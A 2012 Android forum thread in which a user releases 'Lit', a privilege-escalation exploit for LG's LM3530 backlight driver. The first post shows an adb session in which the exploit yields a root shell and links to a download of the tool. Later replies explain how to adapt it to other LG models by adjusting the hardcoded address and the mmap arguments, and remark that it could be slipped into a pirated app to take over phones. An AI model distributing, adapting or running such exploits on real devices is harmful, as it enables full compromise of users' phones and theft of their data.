Privilege Escalation exploit in LG's backlight driver

Discussion in 'Android Devices' started by giantpune, Oct 25, 2012.

  1. giantpune

    giantpune Android Enthusiast
    Thread Starter

    So yesterday I was messing around with trying to get cm7 working when I ran an innocent shell command and my phone crashed. I tracked the cause back to the driver for the backlight in our LCD screen. While I was looking at it, I saw that the bug I found could actually be used to gain root access on our phone from any app that runs.

    It took a couple hours to work up a working example for this that did something besides crash the phone, and I named it 'Lit'. I already have quite a few root exploits for our phone saved up in case LG decides to fix the ones we have publicly. So there's nothing really to lose by not keeping this one to myself.

    I suspect this one also affects other LG phones using the same buggy backlight driver. I have hardcoded an address in this code. To get it working on other models, somebody would need to get the correct address. Lit is a command-line program, so run it from the terminal emulator or adb or something and hopefully it'll give you a root shell. You might also want to contact LG and demand they fix it. I'm not really going to bother with that since I called and emailed them back in July about another one and got ignored.

    Code (Text):
    j@media-pc:~$ adb shell
    $ uname -a
    Linux localhost 2.6.35.11 #1 PREEMPT Tue Jun 19 23:02:28 KST 2012 armv7l GNU/Linux
    $ getprop | grep device
    [ro.product.device]: [m3s]
    $ id
    uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1009(mount),1011(adb),1015(sdcard_rw),3001(net_bt_admin),3002(net_bt),3003(inet)
    $ /data/local/tmp/lit
    Lit - root exploit for the LG LM3530 backlight driver
    2012 giantpune
    [+] Using 29287461 as adapter address
    [+] Opened led reg file
    [+] Mapped 29287000
    [+] algoAddr is at 29287000
    [+] got root
    # id
    uid=0(root) gid=0(root)
    #

    Download lit.tar.gz from Sendspace.com


  2. kwknott

    kwknott Android Expert

    Geez, you're finding more holes in this phone than Swiss cheese :D
  3. Curtis1973

    Curtis1973 Android Expert

    This phone doesn't have holes.. it has BLACKHOLES lol
  4. HaTrEd360

    HaTrEd360 Android Expert

    Lmfao xD
     
  5. ktb83

    ktb83 Android Enthusiast

    If any app can exploit a hole like this one, then Google Wallet has no business being on this phone. :D
  6. giantpune

    giantpune Android Enthusiast
    Thread Starter

    With multiple holes like this one, I wouldn't put my email address, credit card info, or any other personal information into this phone. If it wasn't a prepaid phone, I'd say to check your account every now and then and make sure there aren't any strange 1900 calls or texts sent to those premium numbers that charge you $2 a message.

    With any app being able to get root access whenever it wants, they can most certainly do all this stuff. Definitely make sure you only install apps from trusted places. It would be trivial to stick this or a similar exploit into Angry Birds and toss it up on thepiratebay, and before you know it, your phone becomes somebody else's phone.
  7. lphy

    lphy Newbie

    giantpune, thanks for this great tool

    I am very curious about this small program you wrote. How do I re-compile main.c (if I want to make some changes and try it)?

    What kind of tools did you use to compile it?

    Thanks
  8. giantpune

    giantpune Android Enthusiast
    Thread Starter

    I used the gcc ARM compiler from NDK r8(ish) to make the binary. As far as modifications go, I've found that if you tweak the mmap arguments a bit to get rid of the unnecessary executable permission, the mmap will succeed on some other devices and this exploit works. There are actually about 8 different backlight drivers from LG affected by this one, being used in several models. My root/cwm installer for the L38c family of phones uses this ( http://androidforums.com/l3-all-things-root/682486-root-apk-l38c.html ).

    The Optimus V's backlight driver is also vulnerable, but as the CPU+kernel config is set up in a way that doesn't let us run unaligned addresses, the kernel panics rather than executing the specified address.
  9. lphy

    lphy Newbie

    giantpune,

    Thanks a bunch for this useful information. I will start playing with the compiler to see whether I can compile it to run on my phone.

    Thanks again